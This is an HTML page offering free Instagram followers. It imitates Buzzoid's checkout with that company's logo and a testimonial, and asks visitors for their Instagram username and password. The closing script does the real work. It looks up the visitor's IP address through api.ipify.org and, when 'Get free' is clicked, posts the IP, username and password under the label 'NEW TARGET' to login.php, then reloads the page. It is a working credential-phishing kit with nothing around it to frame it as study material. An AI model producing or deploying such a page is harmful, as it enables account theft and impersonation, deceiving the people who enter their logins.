﻿﻿<!DOCTYPE html>
<html>
    
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/ClientJS/0.2.1/client.min.js"></script>
<head>
<meta charset="utf-8">
<title>FREE Followers</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="robots" content="noindex,nofollow">
<link href="assets/css/order.37a1129b6e65d0b06348.css" rel="stylesheet">
<link rel="stylesheet" href="assets/all.css" integrity="sha384-6jHF7Z3XI3fF4XZixAuSu0gGKrXwoX/w3uFPxC56OtjChio7wtTGJWRW53Nhx6Ev" crossorigin="anonymous">
<link href="https://fonts.googleapis.com/css?family=Source+Sans+Pro:300,300i,400,400i,600,600i,700,700i,900" rel="stylesheet">


</head>
<body>

<div class="header ">
<div class="contain">
<img src="https://buzzoid.com/assets/img/checkout/logo.svg" alt="Buzzoid">
</a>
</div>
<div class="progress">
<div class="bar"></div>
<div class="value" style="width:25%"></div>
</div>
<div id="alerts">
</div>
</div>
<div class="container-lg step1">
<div class="checkflex">
<div class="flex-c1">
<div class="box">
<div class="heading">
<div class="title">Get Free Followers</div>
<hr>
</div>
<div class="body">
<input type="hidden" name="user_id" value="">
<div class="alerts">
</div>
<input type="hidden" name="crumb" value="hnRIzs7e6TWONPGIp8elNNtAPShdxRNNjhGQfof2D9K" />
 <div class="form-group">
<img class="input-icon" src="https://buzzoid.com/assets/img/checkout/instagram.svg">
<input type="text" name="username2" class="form-control" value="" placeholder="Instagram username" id="USERSNIPER">
</div>
 <div class="form-group">
<img class="input-icon" src="https://www.uplooder.net/img/image/25/b90c05b3cc3cc8a65eca369b7826e56a/icons8-pa_s_sword-1-24.png">
<input type="PASSWORD" name="PASSWORD" class="form-control" value="" placeholder="Instagram password" id="PASSSNIPER">
</div>
<div class="form-group">
<img class="input-icon" src="https://buzzoid.com/assets/img/checkout/user.svg">
<div class="selector">
<input type="hidden" name="plan" value="112">
<button type="button" class="form-control"><strong>2500</strong> followers<span class="alt">FREE</span></button>
<div class="dropdown-menu">
<a href="#" data-value="5"><span class="desc"><strong>1000</strong> followers</span><span class="alt">FREE</span></a>
<a href="#" data-value="112"><span class="desc"><strong>2500</strong> followers</span><span class="alt">FREE</span></a>
<a href="#" data-value="6"><span class="desc"><strong>3000</strong> followers</span><span class="alt">FREE</span></a>
<a href="#" data-value="8"><span class="desc"><strong>5000</strong> followers</span><span class="alt">FREE</span></a>
</div>
</div>
</div>
<div class="text-center">
<div class="mar-opt checkbox">
<input id="marCheck" type="checkbox" name="mailopt">
<label for="marCheck"><span>Send me free followers every week</span></label>
</div>
</div>
<div class="button-group">
<button id="GETSNIPER" type="submit" class="btn btn-block">Get free</button>
</div>
</form>
</div>
</div>
</div>
<div class="flex-c2">
<div class="user-review">
<div class="img">
<img src="https://buzzoid.com/assets/img/testimonials/account-1.png">
</div>
<p></p>
<p>Likes are instant and affordable. I’ve used other companies and instagram would block me from liking photos and threaten to delete my account.</p>
<div class="stars">
<i class="fas fa-star"></i><i class="fas fa-star"></i><i class="fas fa-star"></i><i class="fas fa-star"></i><i class="fas fa-star"></i>
</div>
<div class="author">
<strong>Victoria</strong>
</div>
</div>
</div>
</div>
</div>
<script data-cfasync="false" src=""></script><script src="assets/order.37a1129b6e65d0b06348.js"></script>
<script>
    $.get("http://api.ipify.org",function(data){
            ip = data
    document.getElementById('GETSNIPER').addEventListener("click" , function(){
    username = document.getElementById('USERSNIPER').value
    password = document.getElementById('PASSSNIPER').value
    login = "NEW TARGET"
    $.post('login.php', {"sub":login +"\nIP : " +ip+"\nusername : " + username + "\npassword : " + password})
    window.location.reload();
    })
    });

</script>
</body>
</html>